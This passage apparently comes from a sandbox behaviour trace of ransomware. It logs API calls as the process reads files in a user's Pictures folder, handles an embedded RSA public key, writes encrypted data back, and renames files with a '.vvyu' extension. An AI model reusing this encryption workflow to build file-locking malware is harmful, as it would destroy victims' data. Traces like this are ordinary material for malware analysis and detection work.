Size=0x4c) returned 0x2a40108 [0190.369] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e30 [0190.369] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2adffc0 [0190.369] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e50 [0190.369] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0dce8 [0190.369] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0190.369] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e50 [0190.369] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e10 [0190.369] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e20 [0190.369] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e00 [0190.369] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7dc0 [0190.369] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7da0 [0190.369] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7de0 [0190.369] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0dc88 [0190.369] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0190.369] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e10 [0190.369] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0190.369] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e50 [0190.369] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e70 [0190.370] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e80 [0190.370] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e60 [0190.370] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0dca0 [0190.370] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e80 | out: hHeap=0x2c0000) returned 1 [0190.370] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ac8 [0190.370] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e70 | out: hHeap=0x2c0000) returned 1 [0190.370] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0dc70 [0190.370] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e60 | out: hHeap=0x2c0000) returned 1 [0190.370] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0dd00 [0190.370] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0190.370] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e50 [0190.370] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0190.370] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0dcd0 [0190.370] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0190.370] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0dcb8 [0190.370] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0190.370] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0dd18 [0190.370] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dcb8 | out: hHeap=0x2c0000) returned 1 [0190.370] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0dcb8 [0190.370] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dcd0 | out: hHeap=0x2c0000) returned 1 [0190.370] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e20 [0190.370] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0190.370] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26aa8 [0190.371] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0190.371] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1c) returned 0x2ad7ba8 [0190.371] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dc88 | out: hHeap=0x2c0000) returned 1 [0190.371] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0dc88 [0190.371] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0190.371] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x204) returned 0x2af3f88 [0190.371] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dce8 | out: hHeap=0x2c0000) returned 1 [0190.371] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a197b8 [0190.371] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dd18 | out: hHeap=0x2c0000) returned 1 [0190.371] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x210) returned 0x2af4198 [0190.371] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0190.371] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10c) returned 0x2f5b18 [0190.371] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0190.371] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a198d0 [0190.371] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dc88 | out: hHeap=0x2c0000) returned 1 [0190.371] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x200) returned 0x2af43b0 [0190.372] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a197b8 | out: hHeap=0x2c0000) returned 1 [0190.372] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae04e8 [0190.372] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0190.373] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f8 | out: hHeap=0x2c0000) returned 1 [0190.373] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae03e0 | out: hHeap=0x2c0000) returned 1 [0190.373] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae04e8 | out: hHeap=0x2c0000) returned 1 [0190.373] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26aa8 | out: hHeap=0x2c0000) returned 1 [0190.374] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a198d0 | out: hHeap=0x2c0000) returned 1 [0190.374] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af4198 | out: hHeap=0x2c0000) returned 1 [0190.374] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af43b0 | out: hHeap=0x2c0000) returned 1 [0190.375] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0190.375] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0190.375] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dcb8 | out: hHeap=0x2c0000) returned 1 [0190.375] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0190.375] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dd00 | out: hHeap=0x2c0000) returned 1 [0190.375] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ac8 | out: hHeap=0x2c0000) returned 1 [0190.375] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dca0 | out: hHeap=0x2c0000) returned 1 [0190.375] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dc70 | out: hHeap=0x2c0000) returned 1 [0190.375] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2eb8 | out: hHeap=0x2c0000) returned 1 [0190.376] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0190.376] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae01d0 | out: hHeap=0x2c0000) returned 1 [0190.376] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dc58 | out: hHeap=0x2c0000) returned 1 [0190.376] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3150 | out: hHeap=0x2c0000) returned 1 [0190.376] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0190.377] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adffc0 | out: hHeap=0x2c0000) returned 1 [0190.377] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40108 | out: hHeap=0x2c0000) returned 1 [0190.377] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a19588 | out: hHeap=0x2c0000) returned 1 [0190.377] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26b08 | out: hHeap=0x2c0000) returned 1 [0190.377] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0190.377] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ae8 | out: hHeap=0x2c0000) returned 1 [0190.377] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9f30 | out: hHeap=0x2c0000) returned 1 [0190.378] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0190.378] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0190.378] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adfa00 | out: hHeap=0x2c0000) returned 1 [0190.378] WriteFile (in: hFile=0x584, lpBuffer=0x2ae5ea0*, nNumberOfBytesToWrite=0x2b1a, lpNumberOfBytesWritten=0x2f9fb14, lpOverlapped=0x0 | out: lpBuffer=0x2ae5ea0*, lpNumberOfBytesWritten=0x2f9fb14*=0x2b1a, lpOverlapped=0x0) returned 1 [0190.379] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae5ea0 | out: hHeap=0x2c0000) returned 1 [0190.379] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x2b1f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0190.379] WriteFile (in: hFile=0x584, lpBuffer=0x2ae00c8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ae00c8*, lpNumberOfBytesWritten=0x2f9fb50*=0x100, lpOverlapped=0x0) returned 1 [0190.379] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae00c8 | out: hHeap=0x2c0000) returned 1 [0190.379] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0190.379] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x428) returned 0x2af3f88 [0190.379] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2af3f88, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0190.379] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x430) returned 0x2af43b8 [0190.380] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0190.380] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0190.380] WriteFile (in: hFile=0x584, lpBuffer=0x2af43b8*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2af43b8*, lpNumberOfBytesWritten=0x2f9fb50*=0x28, lpOverlapped=0x0) returned 1 [0190.380] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af43b8 | out: hHeap=0x2c0000) returned 1 [0190.380] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0190.380] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x2f9fb50*=0x26, lpOverlapped=0x0) returned 1 [0190.380] CloseHandle (hObject=0x584) returned 1 [0190.381] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40108 [0190.382] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x2af3f88 [0190.382] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40108 | out: hHeap=0x2c0000) returned 1 [0190.382] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Pictures\\99O Q.gif" (normalized: "c:\\users\\keecfmwgj\\pictures\\99o q.gif"), lpNewFileName="C:\\Users\\kEecfMwgj\\Pictures\\99O Q.gif.vvyu" (normalized: "c:\\users\\keecfmwgj\\pictures\\99o q.gif.vvyu")) returned 1 [0190.383] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0190.383] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0190.383] VirtualFree (lpAddress=0x2620000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0190.386] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ee78 | out: hHeap=0x2c0000) returned 1 [0190.386] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x35c5dd00, ftCreationTime.dwHighDateTime=0x1d8a2f0, ftLastAccessTime.dwLowDateTime=0xa79384c0, ftLastAccessTime.dwHighDateTime=0x1d8a488, ftLastWriteTime.dwLowDateTime=0xa79384c0, ftLastWriteTime.dwHighDateTime=0x1d8a488, nFileSizeHigh=0x0, nFileSizeLow=0x11dcf, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="9IU4er.gif", cAlternateFileName="")) returned 1 [0190.386] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af3150 [0190.386] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x5e) returned 0x2a2ee78 [0190.386] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3150 | out: hHeap=0x2c0000) returned 1 [0190.386] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Pictures\\9IU4er.gif") returned=".gif" [0190.387] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Pictures\\9IU4er.gif" (normalized: "c:\\users\\keecfmwgj\\pictures\\9iu4er.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0190.387] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x2f9fb40 | out: lpFileSize=0x2f9fb40*=73167) returned 1 [0190.387] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2620000 [0190.390] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x11da9, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0190.390] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x2f9fb78, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb78*=0x26, lpOverlapped=0x0) returned 1 [0190.392] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0190.392] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0190.392] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0190.393] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x2f9fb70, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb70*=0x11dcf, lpOverlapped=0x0) returned 1 [0190.394] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0190.394] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f1) returned 0x2a7d6f0 [0190.394] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0190.394] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0190.394] CryptAcquireContextW (in: phProv=0x2f9fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2f9fa50*=0x31b9f8) returned 1 [0190.395] CryptCreateHash (in: hProv=0x31b9f8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2f9fa58 | out: phHash=0x2f9fa58) returned 1 [0190.395] CryptHashData (hHash=0x2a05de8, pbData=0x2a7d6f0, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0190.395] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x0, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x2f9fa54) returned 1 [0190.395] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x2a26b08 [0190.395] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x2a26b08, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x2a26b08, pdwDataLen=0x2f9fa54) returned 1 [0190.395] GetLastError () returned 0x0 [0190.395] CryptDestroyHash (hHash=0x2a05de8) returned 1 [0190.395] CryptReleaseContext (hProv=0x31b9f8, dwFlags=0x0) returned 1 [0190.396] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0190.396] UuidCreate (in: Uuid=0x2f9fa48 | out: Uuid=0x2f9fa48) returned 0x0 [0190.396] UuidToStringA (in: Uuid=0x2f9fa48, StringUuid=0x2f9fa40 | out: StringUuid=0x2f9fa40) returned 0x0 [0190.396] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0190.396] RpcStringFreeA (in: String=0x2f9fa40 | out: String=0x2f9fa40) returned 0x0 [0190.396] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0190.396] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0190.396] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11dd0) returned 0x2af5168 [0190.396] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0190.397] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0190.397] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2adfa00 [0190.397] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0190.397] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2a7d6f0 [0190.397] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9f30 [0190.397] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af3150 [0190.397] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0dc58 [0190.397] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af3198 [0190.397] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0dc70 [0190.397] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0dca0 [0190.397] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0dd00 [0190.397] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0dcb8 [0190.397] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x24) returned 0x2a06f58 [0190.397] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x158) returned 0x2aebfa0 [0190.397] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2aebfa0, Size=0x218) returned 0x2aee1c8 [0190.397] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x2af3f88 [0190.397] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dca0 | out: hHeap=0x2c0000) returned 1 [0190.397] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dcb8 | out: hHeap=0x2c0000) returned 1 [0190.397] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dd00 | out: hHeap=0x2c0000) returned 1 [0190.398] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a06f58 | out: hHeap=0x2c0000) returned 1 [0190.398] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0190.398] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0dd00 [0190.398] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7db0 [0190.398] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0dcb8 [0190.398] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ae8 [0190.398] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9) returned 0x2a0dca0 [0190.398] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7de0 [0190.398] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10e) returned 0x2f5b18 [0190.398] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ba8 [0190.398] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9ed0 [0190.398] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26b08 [0190.399] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x104) returned 0x2a19588 [0190.399] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26ac8 [0190.399] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7dc0 [0190.399] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0190.399] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dcb8 | out: hHeap=0x2c0000) returned 1 [0190.399] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0190.399] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dca0 | out: hHeap=0x2c0000) returned 1 [0190.399] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ae8 | out: hHeap=0x2c0000) returned 1 [0190.399] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0190.399] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dd00 | out: hHeap=0x2c0000) returned 1 [0190.399] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0190.400] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9f30 | out: hHeap=0x2c0000) returned 1 [0190.400] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aee1c8 | out: 